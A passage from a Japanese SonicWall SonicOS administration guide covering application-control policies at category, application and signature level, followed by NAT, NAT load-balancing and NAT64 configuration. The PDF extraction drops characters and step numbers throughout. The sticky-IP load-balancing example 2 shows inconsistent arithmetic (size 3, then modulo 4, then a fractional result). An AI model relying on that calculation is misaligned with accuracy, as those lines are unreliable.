• すべての種別とすべてのアプリケーションをアプリケーションごとに表示 (85 ページ)

• すべての種別とすべてのアプリケーションをシグネチャごとに表示 (86 ページ)

• すべての種別とすべてのアプリケーションを種別ごとに表示 (87 ページ)

• 1 つの種別のみ表示 (87 ページ)

• 1 つのアプリケーションのみ表示 (88 ページ)

• シグネチャアプリケーションの詳細の表示 (88 ページ)

• アプリケーションシグネチャの詳細の表示 (90 ページ)

すべての種別とすべてのアプリケーションをアプリケーションごとに表示

「アプリケーション制御詳細」テーブルに表示される列の説明については、すべての種別とすべてのアプリケーションをシグネチャごとに表示 (86 ページ) を参照してください。

表示方法シグネチャ指定した種別に関連付けられているすべてのシグネチャアプ

リケーションとアプリケーションに関連付けられているシグネチャ

アプリケーション (既定)

指定した種別に関連付けられているすべてのシグネチャアプ

リケーション

種別「種別」表示形式で指定した種別

表示形式オプション表示対象



すべての種別とすべてのアプリケーションをシグネチャごとに表示

種別選択したシグネチャ種別またはすべてのシグネチャ種別の名前すべてのシグネチャアプリケーションは、同じ種別見出し ( 「APP-UPDATE」など) でグループ化されます。

アプリケーション

種別内の各シグネチャアプリケーションの名前。

名前シグネチャ名。

ID シグネチャ ID。

遮断種別またはアプリケーションが遮断されているかどうかを示します。遮断が有効な場合、この列には有効アイコンが表示されます。種別の行には「既定」という語が表示される場合があります。

ログ種別またはアプリケーションがログ記録されているかどうかを示します。ログ記録が有効な場合、この列には有効アイコンが表示されます。

方向トラフィックの方向:

コメント種別またはシグネチャアプリケーションに以下を設定していない場合、この列は空

白になります。

• ユーザアイコン - ユーザ/グループの包含/除外設定。 • 情報アイコン - IP アドレスの包含/除外設定。 • 時計アイコン - 「常に有効」以外のスケジュール。

設定シグネチャアプリケーションの設定を変更するためのダイアログを表示する編集ア

イコン。

受信送信両方

受信、クライアント送信、クライアント双方向、クライアント

受信、サーバ送信、サーバ双方向、サーバ

受信、クライアント、サーバ送信、クライアント、サーバ双方向、クライアント、サーバ



すべての種別とすべてのアプリケーションを種別ごとに表示

「アプリケーション制御詳細」テーブルに表示される列の説明については、すべての種別とすべてのアプリケーションをシグネチャごとに表示 (86 ページ) を参照してください。

1 つの種別のみ表示

「アプリケーション制御詳細」テーブルの表示を 1 つの種別のシグネチャアプリケーションのみに限

定するには、以下のいずれかを実行します。

• 「シグネチャ種別」ドロップダウンメニューから種別を選択します。

• 種別見出し ( 「APP-UPDATE」など) を選択します。



1 つのアプリケーションのみ表示

「アプリケーション制御詳細」テーブルの表示を 1 つのアプリケーションのシグネチャのみに限定す

るには、「アプリケーション」ドロップダウンメニューからアプリケーションを選択します。「ア

プリケーション制御詳細」テーブルに表示される列の説明については、すべての種別とすべてのアプリケーションをシグネチャごとに表示 (86 ページ) を参照してください。

シグネチャアプリケーションの詳細の表示シグネチャアプリケーションの詳細を表示するには、シグネチャアプリケーションの名前を選択し

ます。「アプリケーションの詳細」ポップアップダイアログが表示されます。

シグネチャ ID

シグネチャ ID。

種別シグネチャアプリケーションの種別 (P2P、 GAMING など)。



シグネチャ ID を選択すると、そのシグネチャの「SonicALERT」ページが表示されます。

技術

ソフトウェアの種別:• アプリケーション • ブラウザ • ネットワークインフラストラクチャ

リスク

各シグネチャのリスクのレベル:• 低 (緑色) • 警戒 (青色) • 中 (黄色) • 高 (オレンジ)• 深刻 (赤色)



アプリケーションシグネチャの詳細の表示

アプリケーションシグネチャの詳細を表示するには、シグネチャの名前を選択します。「アプリ

ケーションシグネチャの詳細」ポップアップダイアログが表示されます。

アプリケーション制御のグローバル設定の構成

「ルール > アプリケーション制御」ページには、次のグローバル設定が含まれています。

種別シグネチャアプリケーションの種別 ( 「APP-UPDATE」、「GAMING」など)。

アプリケーション名

シグネチャアプリケーションの名前。

警告度警告度:• 低 • 中間 • 高

脅威度シグネチャの脅威度:• 低 (緑色) • 警戒 (青色) • 中 (黄色) • 高 (オレンジ)• 深刻 (赤色)



• アプリケーション制御を有効にする

• すべてのアプリケーションをログする

• グローバルログ冗長フィルタ間隔

• アプリケーション制御の設定

• アプリケーション制御の設定とポリシーをリセット

アプリケーション制御はライセンスされたサービスであり、この機能を使用するには該当するサービスも有効にする必要があります。アプリケーション制御およびアプリケーションルールポリシーの

ログおよび除外リストを設定したり、ポリシーを工場出荷時のデフォルトにリセットすることもできます。詳細については、アプリケーション制御のグローバル設定について (83 ページ) を参照してく

ださい。

トピック :

• アプリケーション制御の有効化 (91 ページ)

• ログとログフィルタ間隔の設定 (92 ページ)

• アプリケーション制御ポリシーのグローバル除外リストの設定 (93 ページ)

• アプリケーション制御設定とポリシー設定を工場出荷時の既定値に戻す (94 ページ)

アプリケーション制御の有効化アプリケーション制御を使用するには、グローバルに有効にする必要があります。また、アプリケーショントラフィックのあるネットワークゾーンで有効にする必要があります。

グローバルなアプリケーション制御の有効化

アプリケーション制御をグローバルに有効にするには：

1 管理ビューで、「ポリシー | ルール > アプリケーション制御」ページを開きます。

1 「アプリケーション制御」チェックボックスをオンにします。

2 「適用」を選択します。

ゾーンごとのアプリケーション制御の有効化

アプリケーション制御をネットワークゾーンごとに有効にするには:

1 管理ビューで、「システムセットアップ | ネットワーク > ゾーン」ページを開きます。



2 設定するゾーンの設定アイコンを選択します。「ゾーンの編集」ダイアログが表示されます。

3 「アプリケーション制御サービスを有効にする」チェックボックスをオンにします。


「ネットワーク > ゾーン」ページでは、アプリケーション制御サービスが有効になっているす

べてのゾーンの「アプリケーション制御」列に緑色のインジケータが表示されます。

ログとログフィルタ間隔の設定

すべてのアプリケーションでログを有効して、冗長フィルタ間隔を指定するには:


1 「すべてのアプリケーションをログする」チェックボックスをオンにします。

2 「グローバルログ冗長フィルタ間隔」フィールドに、グローバルログ冗長フィルタの間隔を秒

数で入力します。範囲は 0～86400 秒で、既定値は 60 秒です。

3 「適用」ボタンを選択します。

メモ：アプリケーション制御ポリシーがあるネットワークゾーン内のトラフィックに適

用されるのは、そのゾーンでアプリケーション制御サービスを有効にしている場合に限ります。アプリケーションルールポリシーは独立しており、ネットワークゾーンに対す

るアプリケーション制御の設定には影響されません。



アプリケーション制御ポリシーのグローバル除外リストの設定

除外リストを設定するには、次の手順に従います。


1 「アプリケーション制御の設定」ボタンを選択します。「アプリケーション制御除外リスト」ダイアログが開きます。

2 グローバル除外リストを有効にするには、「アプリケーション制御除外リストを有効にする」チェックボックスをオンにします。このオプションは、既定では選択されています。

3 IPS 除外リストを使用するには、「IPS 除外リストを有効にする」ラジオボタンを選択し、「OK」を選択します。このオプションは、既定では選択されています。

IPS 除外リストは、管理ビューの「セキュリティ設定 |セキュリティサービス > 侵入防止」ペー

ジを参照してください。

4 除外リストでアドレスオブジェクトを使用するには、「アプリケーション制御除外アドレスオブジェクトを使用する」ラジオボタンを選択します。ドロップダウンメニューが使用可能に

なります。

5 ドロップダウンメニューからアドレスオブジェクトを選択します。または「アドレスオブジェ

クトの作成」を選択します)。




アプリケーション制御設定とポリシー設定を工場出荷時の既定値に戻す

アプリケーション制御設定とポリシー設定を工場出荷時の既定値に戻すには:


1 「アプリケーション制御の設定とポリシーをリセット」ボタンを選択します。確認メッセージが表示されます。




アプリケーション制御の種別ごとの設定種別に基づく設定は、「ルール > アプリケーション制御」ページでも広範囲にわたるポリシー設定

の方法です。種別のリストは、「シグネチャ種別」ドロップダウンメニューで使用できます。

アプリケーション制御ポリシーをアプリケーション種別に対して設定するには:


2 「アプリケーション制御詳細」の下にある「種別」ドロップダウンメニューからアプリケー

ション種別を選択します。種別を選択すると、フィールドの右側に「設定」ボタンが有効になります。

3 「設定」ボタンを選択して、選択した種別の「アプリケーション制御種別の編集」ダイアログを表示します。

4 この種別のアプリケーションを遮断するには、「遮断」ドロップダウンメニューで「有効」を

選択します。



5 この種別のアプリケーションが検出されたときにログエントリを作成するには、「ログ」ドロッ

プダウンリストで「有効」を選択します。

6 選択した遮断やログ記録の動作の対象を特定のユーザまたはユーザのグループに設定するには、「包含するユーザ/グループ」ドロップダウンメニューからユーザグループまたは個々のユーザ

を選択します。「すべて」を選択すると、このポリシーがすべてのユーザに適用されます。

7 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、「除外するユーザ/グループ」ドロップダウンメニューからユーザグループまたは個々の

ユーザを選択します。「なし」を選択すると、このポリシーがすべてのユーザに適用されます。

8 選択した遮断やログ記録の動作の対象を特定の IP アドレスまたはアドレス範囲に設定するには、

「包含する IP アドレス範囲」ドロップダウンメニューからアドレスグループまたはアドレス

オブジェクトを選択します。「すべて」を選択すると、このポリシーがすべての IP アドレスに

適用されます。

9 選択した遮断やログ記録の動作の対象から特定の IP アドレスまたはアドレス範囲を除外するに

は、「除外する IP アドレス範囲」ドロップダウンメニューからアドレスグループまたはアド

レスオブジェクトを選択します。「なし」を選択すると、このポリシーがすべての IP アドレ

スに適用されます。

10 このポリシーを特定の曜日や特定の時間だけ有効にするには、「スケジュール」ドロップダウンメニューから次のスケジュールのいずれかを選択します。

11 既定では、「グローバル設定を使用」オプションが選択されており、既定値の 60 秒を変更でき

ません (フィールドは淡色表示になっています)。繰り返し発生するイベントのログエントリ間

隔を変更するには:

a 「グローバル設定を使用」チェックボックスをオフにします。フィールドが使用可能になります。

b 「ログ冗長フィルタ (秒)」フィールドに間隔を秒数で入力します。小秒数は 0 (間隔な

し )、大秒数は 999999、既定値は 0 です。


スケジュールオプション

スケジュールポリシーを有効にする期間

常に有効常時。このオプションは、既定では選択されています。

勤務時間月曜日から金曜日の午前 8:00 から午後 5:00 まで。

月-火-水-木-金 08:00 から 17:00 月曜日から金曜日の午前 8:00 から午後 5:00 まで ( 「勤務時

間」と同じ )。

時間外月曜日から金曜日の午後 5:00 から翌午前 8:00 まで。

月-火-水-木-金 0:00 から 8:00 月曜日から金曜日の深夜 0:00 から午前 8:00 まで。

月-火-水-木-金 17:00 から 24:00 月曜日から金曜日の午後 5:00 から深夜 0:00 まで。

土-日 00:00 から 24:00 日曜日から土曜日まで毎日 24 時間 ( 「常に有効」と同じ )。

週末時間金曜日の午後 5:00 から月曜日の午前 8:00 まで。

AppFlow 報告時間 AppFlow 報告が設定されている時間。

日-月-火-水-木-金-土 00:00 から24:00

日曜日から土曜日まで毎日 24 時間 ( 「常に有効」と同じ )。

TSR 報告時間 TSR 報告が設定されている時間。



アプリケーション制御のアプリケーションごとの

設定アプリケーションに基づく設定は、「ルール > アプリケーション制御」ページでの中間レベルのポリ

シー設定であり、種別に基づくレベルとシグネチャに基づくレベルの中間に位置付けられます。

この設定方法では、同じ種別内の他のアプリケーションに影響を及ぼすことなく単一のアプリケーションのシグネチャに対してのみポリシーを執行する場合に、そのアプリケーションに特定のポリシールールを作成できます。

アプリケーション制御ポリシーを特定のアプリケーションに対して設定するには:


2 (オプション) 「アプリケーション制御詳細」の下にある「シグネチャ種別」ドロップダウンメ

ニューから種別を選択します。これによって、アプリケーションを選択しやすくなります。

3 「アプリケーション」ドロップダウンリストからアプリケーションを選択します (種別を選択

しなかった場合は、選択したアプリケーションの種別に変わります)。アプリケーションを選

択すると、フィールドの右側に「設定」ボタンが表示されます。



4 「設定」ボタンを選択して、選択したアプリケーションの「アプリケーション制御アプリケーションの設定」ダイアログを表示します。

このダイアログの上部にあるフィールド「アプリケーション種別」および「アプリケーション名」は編集できません。他の設定パラメータには、アプリケーションが属する種別の現在の設定が既定で設定されます。種別の設定に対するこの関係を 1 つ以上のフィールドで維持するに

は、それらのフィールドでのこうした選択をそのままにしておきます。

5 このアプリケーションを遮断するには、「遮断」ドロップダウンメニューで「有効」を選択し

ます。

6 このアプリケーションが検出されたときにログエントリを作成するには、「ログ」ドロップダ

ウンメニューで「有効」を選択します。



8 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、「除外するユーザ/グループ」ドロップダウンメニューからユーザグループまたはユーザ

を選択します。「なし」を選択すると、このポリシーがすべてのユーザに適用されます。

ヒント：アプリケーションの「遮断」設定が「種別設定の使用」に設定されている場

合、このメッセージは次のように表示されます。

カテゴリ設定がアプリケーションの設定を上書きしないようにするには、必要に応じて「遮断」の設定を「有効」または「無効」に変更し、このダイアログで必要な値を選択します。











11 このポリシーを特定の曜日や特定の時間だけ有効にするには、「スケジュール」ドロップダウンメニューからスケジュールのいずれかを選択します。スケジュールのリストについては、ス

ケジュールオプションを参照してください。

12 既定では、「ログ冗長フィルタ (秒)」の「種別設定を使用」オプションが選択されています。

フィールドは淡色表示になっていて変更できません。繰り返し発生するイベントのログエント

リ間隔を変更するには:

a 「グローバル設定を使用」チェックボックスをクリアします。フィールドが使用可能になります。




シグネチャによるアプリケーション制御の設定シグネチャに基づく設定は、「ルール > アプリケーション制御」ページでの下位 ( も具体的な) レベルの設定です。

特定のシグネチャに基づくポリシーを設定すると、同じアプリケーションの他のシグネチャに影響を及ぼすことなく個々のシグネチャに対してポリシーを設定できます。

アプリケーション制御ポリシーを特定のシグネチャに対して設定するには:


2 「アプリケーション制御詳細」テーブルまでスクロールします。

3 「表示方法」ドロップダウンメニューで「シグネチャ」を選択します。

4 設定するシグネチャの行にある「設定」ボタンを選択します。「アプリケーション制御シグネチャの編集」ダイアログが表示されます。

ヒント：必要に応じて、「カテゴリ」ドロップダウンメニューまたは「アプリケーショ

ン」ドロップダウンメニューからカテゴリを選択して、表示されるシグネチャの数を減

らします。

ヒント：シグネチャのシグネチャ ID がわかっている場合は、「検索するシグネチャ ID」フィールドに入力し、「検索」アイコンを選択します。



このダイアログの上部にあるフィールドは編集できません。これらのフィールドには、「シグネチャ種別」、「シグネチャ名」、「シグネチャ ID」、「アプリケーション ID」、「危険

度」、このシグネチャが属する種別およびアプリケーションのトラフィックの「方向」の値が表示されます。

シグネチャに対する他の設定には、シグネチャが属するアプリケーションの現在の設定が使用されます。アプリケーションの設定に対するこの関係を 1 つ以上のフィールドで維持するに

は、それらのフィールドでのこうした選択をそのままにしておきます。

5 このシグネチャを遮断するには、「遮断」ドロップダウンメニューで「有効」を選択します。

ヒント：シグネチャの「遮断」設定が「ユーザアプリケーション設定の使用」に設定さ

れている場合、このメッセージは次のように表示されます。

アプリケーション設定がシグネチャの設定を上書きしないようにするには、必要に応じて「遮断」の設定を「有効」または「無効」に変更し、このダイアログで必要な値を選択します。

ヒント：アプリケーション情報を編集するには、「アプリケーション ID」フィールドの

横にある編集アイコンを選択します。「アプリケーション制御: アプリケーションの編

集」ダイアログが表示されます。このダイアログの設定の詳細については、アプリケーション制御のアプリケーションごとの設定 (97 ページ) を参照してください。



6 このシグネチャが検出されたときにログエントリを作成するには、「ログ」ドロップダウンメニューで「有効」を選択します。



8 選択した遮断やログ記録の動作の対象から特定のユーザまたはユーザのグループを除外するには、「除外するユーザ/グループ」ドロップダウンメニューからユーザグループまたは個々の

ユーザを選択します。「なし」を選択すると、このポリシーがすべてのユーザに適用されます。









11 このポリシーを特定の曜日や特定の時間だけ有効にするには、「スケジュール」ドロップダウンメニューからスケジュールのいずれかを選択します。スケジュールのリストについては、ス

ケジュールオプションを参照してください。

12 既定では、「ログ冗長フィルタ (秒)」の「種別設定を使用」オプションが選択されています。

フィールドは淡色表示になっていて変更できません。繰り返し発生するイベントのログエント

リ間隔を変更するには:

a 「グローバル設定を使用」チェックボックスをオフにします。フィールドが使用可能になります。



13 シグネチャに関する詳細な情報を確認するには、ダイアログ下部の「補足」にある「ここを選択」を選択します。




4

NAT ポリシーの設定

• ルール > NAT ポリシー (102 ページ)

• SonicOS での NAT について (103 ページ)

• NAT 負荷分散について (104 ページ)

• NAT64 について (106 ページ)

• NAT ポリシーエントリの表示 (107 ページ)

• 「 NAT または NAT64 の追加または編集」ポリシー (108 ページ)

• NAT ポリシーの削除 (113 ページ)

• NAT ポリシーの作成例 (114 ページ)

ルール > NAT ポリシー

トピック :

• SonicOS での NAT について (103 ページ)

• NAT 負荷分散について (104 ページ)

• NAT64 について (106 ページ)

• NAT ポリシーエントリの表示 (107 ページ)

• 「 NAT または NAT64 の追加または編集」ポリシー (108 ページ)

• NAT ポリシーの削除 (113 ページ)

• NAT ポリシーの作成例 (114 ページ)


NAT ポリシーの設定102

SonicOS での NAT について

SonicOS のネットワークアドレス変換 (NAT) エンジンでは、送受信トラフィックに関して、きめ細か

な NAT ポリシーを定義できます。既定では、 X0 インターフェースに接続されたすべてのシステムに対

して X1 インターフェースの IP アドレスを使用する多対 1 の NAT の実行を許可する NAT ポリシーと、

トラフィックがその他のインターフェース間を転送される場合には NAT を行わないポリシーが、ファ

イアウォールに事前設定されています。このセクションでは、も一般的な NAT ポリシーの設定方法

について説明します。

NAT ポリシーの使用方法を理解するには、まず IP パケットの構築から調査します。各パケットにはアド

レッシング情報が含まれており、それによって、パケットが送信先に到達することと、送信先が要求元に対して応答を返すことが可能になっています。パケットには (その他の情報とともに)、要求元の

IP アドレス、要求元のプロトコル情報、および送信先の IP アドレスが格納されています。 SonicOS のNAT ポリシーエンジンは、パケット内の NAT に関連する部分を検査したり、送信トラフィックだけで

なく受信トラフィックの指定されたフィールドの情報を動的に書き換えたりすることができます。

SonicWall ネットワークセキュリティプラットフォームに応じて大 512 ～ 2048 の NAT ポリシーを追

加できます。必要なだけ細かく設定できます。また、同じオブジェクトを対象とする複数の NAT ポリ

シーを作成することも可能です。これにより、例えば、内部サーバが Telnet サーバにアクセスする際

には特定の 1 つの IP アドレスを使用して、その他のすべてのプロトコルの通信にはまったく別の IPアドレスを使用するように指定することもできます。 SonicOS の NAT エンジンは受信ポート転送をサ

ポートしているため、ファイアウォールの WAN IP アドレスから複数の内部サーバを隠蔽することが

できます。 NAT ポリシーは粒度が細かくなればなるほど優先順位が高くなります。

ファイアウォールの各モデルで使用可能なルートと NAT ポリシーの大数テーブルは、 SonicOS 6.5で実行中の各ネットワークセキュリティ装置モデルで可能なルートと NAT ポリシーの大数の一覧です。

重要： NAT ポリシーを設定する前に、そのポリシーに関連付けるすべてのアドレスオブジェク

トを作成してください。例えば、 1 対 1 の NAT ポリシーを作成する場合は、パブリックおよびプ

ライベートの IP アドレスを表すアドレスオブジェクトが必要です。

ヒント：既定では、 LAN から WAN へのトラフィックにはファイアウォールで事前に定義された

NAT ポリシーが適用されます。

ファイアウォールの各モデルで使用可能なルートと NAT ポリシーの大数

モデルルート

NAT ポリシーモデルルート

NAT ポリシー静的動的静的動的

SM 9800 3072 4096 2048 TZ600 256 1024 512

SM 9600 3072 4096 2048 TZ500/TZ500W 256 1024 512

SM 9400 3072 4096 2048 TZ400/TZ400W 256 1024 512

SM 9200 3072 4096 2048 TZ300/TZ300W 256 1024 512

NSA 6600 2048 4096 2048

NSA 5600 2048 4096 2048

NSA 4600 1088 2048 1024 SOHO W 256 1024 512

NSA 3600 1088 2048 1024

NSA 2650 1088 2048 1024

NSA 2600 1088 2048 1024



用語集

NAT 負荷分散についてネットワークアドレス変換 (NAT) と負荷分散 (LB) の機能を組み合わせると、受信トラフィックの負荷

を複数の類似したネットワークリソースに分散することができます。これを SonicOS のフェイルオー

バーと負荷分散機能と混同しないでください。両方の機能を併用することができますが、フェールオーバーと負荷分散を使用して WAN 接続をアクティブに監視し、 WAN インターフェースの障害/復旧に応じて動作し、 NAT LB は主に着信トラフィックのバランスをとるために使用されます。

負荷分散は、トラフィックを複数の類似したネットワークリソースに振り分けることによって、単

一のサーバに過大な負荷がかかることを防ぎ、信頼性と冗長性の向上に貢献します。また、 1 つの

サーバが使用できない状態になった場合でも、トラフィックは使用可能なリソースに転送されるため、システム稼働時間の大化が実現されます。

ここでは、パブリックインターネットのシステムから、 1 つまたは複数の内部システム (ウェブサー

バ、 FTP サーバ、 SonicWall SMA 装置など) に割り当てられた仮想 IP へのアクセスを可能にするために

必要な NAT、負荷分散、健全性チェック、ログ記録、およびファイアウォールルールの設定方法につ

いて詳しく説明します。対象のポートがファイアウォール自体では使用されていない場合、この仮想

IP は、ファイアウォールとは無関係に設定されているものや、共有で使用されているものでも問題あ

りません。

参考資料:

• 使用する NAT LB 方式の決定 (105 ページ)

• 注意 (105 ページ)

• 負荷分散アルゴリズムの適用方法 (105 ページ)

• スティッキー IP アルゴリズムの例 (106 ページ)

DNS64 IPv6 クライアントから IPv4 サーバへのネットワークアドレス変換のための

DNS 拡張

IPv4 に変換された IPv6 アドレス

IPv6 ネットワークで IPv4 ノードを表すために使用される IPv6 アドレス

IPv4 が埋め込まれた IPv6 アドレス

32 ビットに IPv4 アドレスが格納されている IPv6 アドレス

NAT ネットワークアドレス変換

NAT64 IPv6 クライアントから IPv4 サーバへのネットワークアドレスおよびプロト

コルのステートフル変換

NATPT ネットワークアドレス変換 - プロトコル変換

PMTUD 経路 MTU 探索

XLAT IP/ICMP トランスレータ

メモ： SonicOS に搭載されている負荷分散機能は、それほど高度なものではありませんが、多く

のネットワーク配備の要件を十分に満たす能力を備えています。さらに粒度の細かい負荷分散や恒久性と健全性チェックのメカニズムが必要なネットワークの場合は、サードパーティ製の専用の負荷分散装置を使用することをお勧めします。



使用する NAT LB 方式の決定

注意• 利用可能な健全性チェックメカニズムは 2 種類 (ICMP Ping と TCP ソケットオープン) のみです。

• 上位層の恒久性メカニズムは利用できません (スティッキー IP のみ使用可能)。

• グループ内のすべてのサーバが応答しない場合に備えるための “Sorry-Server" メカニズムは利用

できません。

• “恒久性を備えたラウンドロビン" メカニズムは利用できません。

• “重み付きラウンドロビン" メカニズムは利用できません。

• リソースが過負荷になっていることを検出する手段は用意されていません。

SonicWall ネットワークセキュリティ装置では、負荷分散の対象として設定可能な内部リソースの数

に制限はなく、監視可能なホストの数にも制限はありませんが、 (リソースの数が 25 を超えるような)非常に大規模な負荷分散グループを作成すると、パフォーマンスに影響が及ぶおそれがあります。

負荷分散アルゴリズムの適用方法

使用する NAT LB 方式を決定する

要件配備例 NAT LB 方式

サーバ負荷の均等な分散 (恒久性は

不要)外部/内部サーバ (ウェブまたは FTP) ラウンドロビン

無差別な負荷分散 (恒久性は不要) 外部/内部サーバ (ウェブまたは FTP) ランダム分散

クライアント接続の恒久性電子商取引サイト、電子メールセキュ

リティ、 SonicWall SMA 装置

(恒久性が要求される任意の公開サーバ)

スティッキー IP

送信元ネットワークから送信先範囲への再割付の精密な制御

LAN から DMZ サーバへ

電子メールセキュリティ、 SonicWallSMA 装置

ブロック再割付

送信元ネットワークと送信先ネットワークの再割付の精密な制御

内部サーバ (イントラネットまたはエ

クストラネット )対称再割付

ラウンドロビン送信元 IP を各送信先 IP に交互に接続します。

ランダム分散送信元 IP は、各送信先 IP にランダムに接続されます。

スティッキー IP 送信元 IP を常に同じ送信先 IP に接続します。

ブロック再割付送信元ネットワークを送信先プールのサイズに分割することによって、論理セグメントを作成します。

対称再割付送信元 IP を送信先 IP に割り付けます (例えば、 10.1.1.10->192.168.60.10)。



スティッキー IP アルゴリズムの例

送信元 IP をサーバクラスタの台数で除算し、その剰余に応じて割付先のサーバを決定します。以下

に、スティッキー IP アルゴリズムによる割付先決定処理の例を 2 つ示します。

• 例 1 - ネットワークへの割付 (106 ページ)

• 例 2 - IP アドレス範囲への割付 (106 ページ)

例 1 - ネットワークへの割付

192.168.0.2～192.168.0.4 変換後の送信先 = 10.50.165.0/30 (ネットワーク )

パケットの送信元 IP = 192.168.0.2 192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010 (IP->16 進->10 進->2 進)

スティッキー IP 計算式 = パケットの送信元 IP = 3232235522[剰余算]変換先サイズ = 2= 3232235522[剰余算]2= 0 (被乗数は 2 で割り切れる)。剰余はなく、結果は 0)

スティッキー IP 計算式によって算出されたオフセットは 0。

送信先を 10.50.165.1 に再割付。

例 2 - IP アドレス範囲への割付

192.168.0.2～192.168.0.4 変換後の送信先 = 10.50.165.1 ～ 10.50.165.3 (範囲)

パケットの送信元 IP = 192.168.0.2 192.168.0.2 = C0A80002 = 3232235522 = 11000000101010000000000000000010 (IP->16 進->10 進->2 進)

スティッキー IP 計算式 = パケットの送信元 IP = 3232235522[剰余算]変換先サイズ = 3 = 3232235522[剰余算]4 = 1077411840.6666667 - 1077411840 = 0.6666667 ＊ 3 = 2

スティッキー IP 計算式によって算出されたオフセットは 2。

送信先を 10.50.165.3 に再割付

NAT64 についてSonicOS では、 NAT64 トランスレータと呼ばれる、 IPv6 から IPv4 への変換を行うデバイスを利用して

IPv6 専用クライアントが IPv4 専用サーバにアクセスできる NAT64 機能をサポートしています。 NAT64は、旧来の IPv4 専用サーバに IPv6 ネットワークからアクセスする機能を提供します。その場合、

NAT64 対応の SonicWall が中間ルータとして配置されます。

SonicOS を NAT64 トランスレータとして使用すると、任意のゾーンにある IPv6 専用クライアントか

ら、適切なルートが設定された IPv4 専用サーバへの通信を開始できます。 SonicOS によって IPv6 アド

レスは IPv4 アドレスにマッピングされ、 IPv6 トラフィックが IPv4 トラフィックに変わります。その

逆も同様です。 IPv6 と IPv4 の間のパケットヘッダーの変換によってこのマッピングを可能にするた



めに、 IPv6 アドレスプール (アドレスオブジェクトとして表されます) と IPv4 アドレスプールが作成

されます。 IPv4 ホストの IPv4 アドレスは、 SonicOS で設定された IPv6 接頭辞を使用して、 IPv6 アドレ

スと双方向で変換されます。

DNS64 トランスレータは NAT64 機能を有効にします。 IPv6 クライアントによって DNS64 サーバを設定

するか、 IPv6 クライアントがゲートウェイから自動取得する DNS サーバアドレスが DNS64 サーバに

なっている必要があります。 IPv6 専用クライアントの DNS64 サーバは、 A レコード (IPv4) を用いて

AAAA レコード (IPv6) を作成します。 SonicOS は DNS64 サーバとしては機能しません。

Pref64::/n の使用

Pref64::/n は、 IPv6 と IPv4 間のプロトコル変換のためにアクセスネットワークで使用される IPv6 接頭

辞です。 Pref64::/n 接頭辞は SonicOS で設定されます。よく知られた Pref64::/n 接頭辞 64:ff9b::/96は SonicOS によって自動的に作成されます。

Pref64::/n は、 IPv6 専用クライアントから NAT64 を経由して IPv4 専用クライアントに到達できるネッ

トワークを定義します。 SonicOS では、ネットワーク種別のアドレスオブジェクトは、 Pref64::/n を持つすべてのアドレスを含むように構成できます。このアドレスオブジェクトは、 NAT64 を実行でき

るすべての IPv6 クライアントを表します。

DNS64 サーバは、 Pref64::/n を使用して、初の n ビットと Pref64::/n を比較することで、 IPv6 アドレ

スが IPv4 の埋め込まれた IPv6 アドレスであるかどうかを判断します。 DNS64 は、 Pref64::/n と IPv4 アドレスレコードを合成して DNS 応答を IPv6 専用クライアントに送信することで、 IPv4 が埋め込まれ

た IPv6 アドレスを作成します。

Pref64::/n アドレスオブジェクトの設定については、既定の Pref64 アドレスオブジェクト (189 ページ)を参照してください。

NAT ポリシーエントリの表示

トピック :

• 表示の変更 (107 ページ)

• 表示のフィルタリング (108 ページ)

• ポリシーに関する情報の表示 (108 ページ)

表示の変更「ルール > NAT ポリシー」ページには、「検索」、「表示」、「表示」、および更新を含む、ページ

の上部に表示オプションがあります。

重要：現時点での NAT64 機能は次のとおりです。

• TCP、 UDP、および ICMP トラフィックを伝送するユニキャストパケットのみを変換します。 • FTP および TFTP アプリケーション層プロトコルのストリームはサポートしていますが、

H.323、 MSN、 Oracle、 PPTP、 RTSP、および RealAudio アプリケーション層プロトコルのストリームはサポートしていません。

• IPv4 から開始された IPv6 ホストのサブセットへの通信をサポートしていません。 • ステートフル高可用性をサポートしていません。

NAT64 トラフィックの一致のために、 2 つの混在型接続キャッシュが作成されます。そのため、

NAT64 接続キャッシュのキャパシティは、純粋な IPv4 または IPv6 接続用の半分となります。



ページの上部にある「表示」ドロップダウンリストで、次のいずれかのオプションを選択して、 NATポリシーの表示を変更できます。

表示のフィルタリング「検索」フィールドにポリシー番号 ( 「#」列に記載されている番号) を入力することにより、特定の

NAT ポリシーを表示できます。「検索」フィールドを使用して、英数字の検索パターン (WLAN、 X1IP、 Private など) を入力して関心のあるポリシーのみを表示することもできます。

ポリシーに関する情報の表示「NAT ポリシー」テーブルの「コメント」列にあるコメントアイコンの上にポインタを移動すると、

ユーザ定義ポリシーについては、「NAT ポリシーの追加」ダイアログの「コメント」フィールドに入

力したコメントが表示されます。既定のポリシーには、 IKE NAT ポリシーや NAT 管理用ポリシーな

ど、 NAT ポリシーの種別の簡単な説明があります。

「NAT ポリシー」テーブルの「設定」列にある統計アイコンの上にポインタを移動すると、 NAT ポリ

シーのトラフィック統計情報が表示されます。

「 NAT または NAT64 の追加または編集」ポリシー

さまざまな種別の NAT ポリシーの例については、 NAT ポリシーの作成例 (114 ページ) を参照してくだ

さい。

すべての種別「ユーザ定義ポリシー」および「既定のポリシー」を含むすべてのルーティングポリシーが表示されます。 NAT ポリシーをまだ作成していない初

期段階では、既定のポリシーだけが表示されます。

既定既定のポリシーだけが表示されます。

ユーザ定義設定した NAT ポリシーだけが表示されます。

メモ：既定の NAT ポリシーは編集できません。



NAT または NAT64 ポリシーを作成または編集するには：

1 管理ビューで、「ポリシー | ルール > NAT ポリシー」を開きます。

2 以下のいずれかを実行します。

• 新しい NAT ポリシーを作成するには、ページの上部にある「追加」ボタンを選択します。

「NAT ポリシーの追加」ダイアログが表示されます。

• 既存の NAT ポリシーを編集するには、その NAT ポリシーの「設定」列にある編集アイコ

ンを選択します。「NAT ポリシーの編集」ダイアログが表示されます。

この 2 つのダイアログは同じ内容ですが、「NAT ポリシーの編集」ダイアログの一部のオプ

ションは変更できません。「IP バージョン」で「NAT64 のみ」が選択されている場合、オプ

ションは変わります。

3 「一般」画面で、次の設定を行います。

• 変換前の送信元または IPv6 変換前の送信元: このドロップダウンメニューの設定は、ファ

イアウォールを通過するパケット (インターフェース間を転送されるパケットや、 VPNトンネルに入る/から出るパケット ) の送信元の IP アドレスを識別するために使用されま

す。次の操作が可能です。

• 事前定義されたアドレスオブジェクトを選択する

• 「すべて」を選択する

• 独自のアドレスオブジェクトを作成する

